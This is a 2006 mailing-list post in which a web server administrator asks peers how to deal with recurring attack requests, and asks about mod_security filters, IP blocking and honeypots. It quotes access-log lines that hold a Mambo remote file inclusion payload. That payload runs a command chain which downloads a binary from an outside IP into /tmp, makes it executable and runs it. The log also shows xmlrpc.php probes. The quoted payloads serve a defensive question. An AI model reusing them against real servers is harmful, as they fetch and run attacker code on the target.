|
From: <Ral...@it...> - 2006-02-23 13:16:30
|
Hello, I guess evil noise like that is mundane encounter to any WWW webserver admin and probably an unavoidable plague as is SPAM for SMTP relays. Because I haven't administered a WWW servicing webserver yet I luckily have missed such filth so far. Of course these requests aren't serviced by our webserver and mod_security dutifully sends them a 404, nevertheless they waste bandwidth, file system space for their logging and processing resources. On the other hand I'am hesitant to drop those source IP addresses by my packet filter because I suspect them (if not spoofed) to originate from an ISP's dynamic IP pool, and thereby blocking the next unlucky decent guy who happens have temporarily assigned such an abused IP address. So I would like to ask you seasoned webserver admins how best to handle these requests? Do you simply drop them, or do you redirect them to sites e.g. such as http://www.gulli.com/ , or some CERT blacklist etc.? As for mod_security, what would a neat filter look like to counter or trick them? Is the setup of a honeypod that would draw attention from the webserver advisable, or is such in vain? Here's an excerpt from our access_log of requests trying to wget and run some hostile code through our webserver. As these reappear on a regular basis I assume that some attack kits that generate them are in widespread use. 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET /index2.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2 .php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mos Config_absolute_path=3Dhttp://209.123.16 .34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074 4%20gicumz;./gicumz;echo%20YYY;echo| =20 HTTP/1.1" 404 208 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET /index.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2. php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosC onfig_absolute_path=3Dhttp://209.123.16. 34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744 %20gicumz;./gicumz;echo%20YYY;echo| H TTP/1.1" 404 207 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET /mambo/index2.php?_REQUEST[option]=3Dcom_content&_RE QUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.1 6.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209 .123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 214 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET /cvs/index2.php?_REQUEST[option]=3Dcom_content&_REQU EST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.16. 34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.1 23.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 212 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=3Dcom_co ntent&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp:// 209.123.16.34/cmd.gif?&cmd=3Dcd%20/tmp;w get%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20Y YY;echo| HTTP/1.1" 404 223 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=3Dcom_content &_REQUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.1 23.16.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%2 0209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;ec ho| HTTP/1.1" 404 218 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 403 217 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 403 219 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 225 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 222 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 403 219 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 219 |
